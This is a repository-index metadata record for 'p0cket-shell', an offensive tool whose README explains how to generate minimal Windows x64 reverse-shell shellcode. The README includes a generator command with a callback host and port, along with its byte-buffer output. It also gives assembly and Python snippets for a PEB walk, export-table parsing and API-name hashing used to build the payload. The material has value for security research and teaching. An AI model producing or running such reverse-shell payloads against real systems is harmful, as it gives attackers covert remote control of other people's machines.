{"id":28795390,"url":"https://github.com/silentisvox/p0cket-shell","last_synced_at":"2026-04-24T11:38:39.108Z","repository":{"id":298043696,"uuid":"998666641","full_name":"SilentisVox/p0cket-shell","owner":"SilentisVox","description":"Smallest Reverse Shell Shellcode by p0cket-shell","archived":false,"fork":false,"pushed_at":"2025-06-17T20:40:49.000Z","size":69,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"master","last_synced_at":"2025-06-17T21:36:29.116Z","etag":null,"topics":["malware","malware-analysis","malware-development","offensive-security","payload","payload-generator","red-team","remote-access-tool","remote-access-trojan","remote-control","reverse-shell","shellcode","shellcode-generator","shellcode-loader","windows-shellcode","x64"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/SilentisVox.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-06-09T03:59:10.000Z","updated_at":"2025-06-17T20:40:53.000Z","dependencies_parsed_at":null,"dependency_job_id":"f975e0d0-4719-4db3-93c0-39c7d224fb0b","html_url":"https://github.com/SilentisVox/p0cket-shell","commit_stats":null,"previous_names":["silentisvox/p0cket-shell"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/SilentisVox/p0cket-shell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SilentisVox%2Fp0cket-shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SilentisVox%2Fp0cket-shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SilentisVox%2Fp0cket-shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SilentisVox%2Fp0cket-shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/SilentisVox","download_url":"https://codeload.github.com/SilentisVox/p0cket-shell/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SilentisVox%2Fp0cket-shell/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":260477918,"owners_count":23015064,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["malware","malware-analysis","malware-development","offensive-security","payload","payload-generator","red-team","remote-access-tool","remote-access-trojan","remote-control","reverse-shell","shellcode","shellcode-generator","shellcode-loader","windows-shellcode","x64"],"created_at":"2025-06-18T03:07:32.294Z","updated_at":"2026-04-24T11:38:39.098Z","avatar_url":"https://github.com/SilentisVox.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# p0cket-shell\n\n[![Python](https://img.shields.io/badge/Python-%E2%89%A5%203.6-yellow.svg)](https://www.python.org/)\n\u003cimg src=\"https://img.shields.io/badge/Developed%20on-Windows%2011-1677CF\"\u003e\n[![License](https://img.shields.io/badge/License-BSD%203%20Clause%20license-C91515)](https://github.com/SilentisVox/Silence/blob/master/LICENSE)\n\u003cimg src=\"https://img.shields.io/badge/Maintained%3F-Yes-1FC408\"\u003e\n\np0cket-shell is the most compact reverse shell shellcode available.\nThe intention of this shellcode was to explore the least amount of instructions in an executable to establish a reverse shell.\nAlthough I do not think that the executable is objetively the smallest, it is miles smaller than what I originally researched.\n\n**Disclaimer**: The purpose of this generated shellcode is for educational purposes and testing only.\nDo not use this shellcode on machines you do not have permission to use.\nDo not use this shellcode to leverage and communicate with machines that you do not have authorization to use.\n\n## Installation\n\n```PowerShell\ngit clone https://github.com/SilenitsVox/p0cket-shell\ncd p0cket-shell\npython p0cket-shell.py\n```\n\n## Usage\n\nGenerating the shellcode is simply put.\nThe payload is a Windows x64 Reverse Shell, and can run on every Windows x64 machine `[2026-04-21]`.\nNo argument is mandatory, but the will be filled with default values.\n\n- `LHOST=`, you must use a valid ip `0.0.0.0`.\n- `LPORT=`, you must use a valid port `0-65535`.\n- `EXITFUN=`, you may apply the values `process || thread`\n- `FORMAT=`, you may apply the values `asm || c || powershell || python || raw`.\n\n```PowerShell\n\u003e python p0cket-shell.py                \\\nlhost=192.168.0.101                     \\\nlport=4444                              \\\nexitfun=thread                          \\\nformat=ps1\n\n[*] Payload size: 386 bytes\n[*] Final size of PowerShell file: 2646 bytes\n$Buffer = [Byte[]] @(\n        0x40, 0x80, 0xE4 ...\n```\n\n## How it works.\n\nTo create a reverse shell, you must make a connection, and pass the respective socket object to a process' standard handles.\nThe functions of choice are `CreateProcessA` \u0026 `connect` (which subsequently require `WSAStartup` \u0026 `WSASocketA`).\nThese functions are located within `kernel32.dll` \u0026 `ws2_32.dll`.\n\n###### Elaboration at https://github.com/SilentisVox/Reverse-Shell-with-Indirect-Syscalls\n\nTo gather pointers to these functions, we must parse both modules and gather the address' of each function.\nWe can gather the base address of `kernel32.dll` with a **PEB walk**;\nWe can load `ws2_32.dll` with the `LoadLibraryA` function from `kernel32.dll`.\n\n```x86asm\nGET_KERNEL32:\n        MOV     RAX,    GS:[0x60]               ; pTEB            + 0x60 =\u003e pPEB\n        MOV     RAX,    QWORD   [RAX + 0x18]    ; pPEB            + 0x18 =\u003e pLoaderData\n        MOV     RAX,    QWORD   [RAX + 0x30]    ; pLoaderData     + 0x30 =\u003e \n        MOV     RAX,    QWORD   [RAX]           ; pInLoadOrderModuleList =\u003e Flink\n        MOV     RAX,    QWORD   [RAX]           ; Flink                  =\u003e Flink\n        MOV     RAX,    QWORD   [RAX + 0x10]    ; Flink           + 0x10 =\u003e pModule\n```\n\nOnce the base address to a module is obtained, we can parse it for symbol export datas.\nThe datas are laid out in individual fields that correspond to eachother.\nKey fields from the **Export Directory** are: `NumberOfNames`, `NumberOfFunctions`, `AddressOfNames`, `AddressOfFunctions`, \u0026 `AddressOfNameOrdinals`.\n\n```\n; EXAMPLE\nExportDirectory:\n        0x18: XXXX XXXX ; NumberOfNames\n        0x1C: XXXX XXXX ; AddressOfFunctions\n        0x20: XXXX XXXX ; AddressOfNames\n        0x24: XXXX XXXX ; AddressOfNameOrdinals\n```\n\nTo gather a functions address, you must know which index it is in the exported name list.\nThe index X 2 added to the AddressOfNameOrdinals will give you the address to the RVA slot.\nThe 2 byte value at that address is the ordinal of the function.\nThe ordinal value X 4 added to the AddressOfFunctions will give you the address to the function offset.\nThe 4 byte value at that address is the offset within the module to that function.\nThe base address + offset is the full address of the function.\n\nWhen resolving the function address, we must have some unique identifier regarding the function.\nIncluding names, instructions from the function, or **hashes** of the function names.\nThe simplest of hashing algorithms can be used.\n\n###### Example for python\n\n```python\ndef ROR7__32(NAME: str) -\u003e int:\n        HASH = 0\n        for CHAR in NAME:\n                HASH = ((HASH \u003e\u003e 7) | (HASH \u003c\u003c 25)) \u0026 0xFFFFFFFF\n                HASH = (HASH + ord(CHAR)) \u0026 0xFFFFFFFF\n        return HASH\n```\n\n###### Example for assembly\n\n```x86asm\n        XOR     RAX,    RAX\n        XOR     RCX,    RCX\nROR7__32:\n        LODSB\n        CMP     AL,     0\n        JZ      EXIT\n        ROR     ECX,    7\n        ADD     ECX,    EAX\n        JMP     ROR7__32\nEXIT:\n        RET\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsilentisvox%2Fp0cket-shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsilentisvox%2Fp0cket-shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsilentisvox%2Fp0cket-shell/lists"}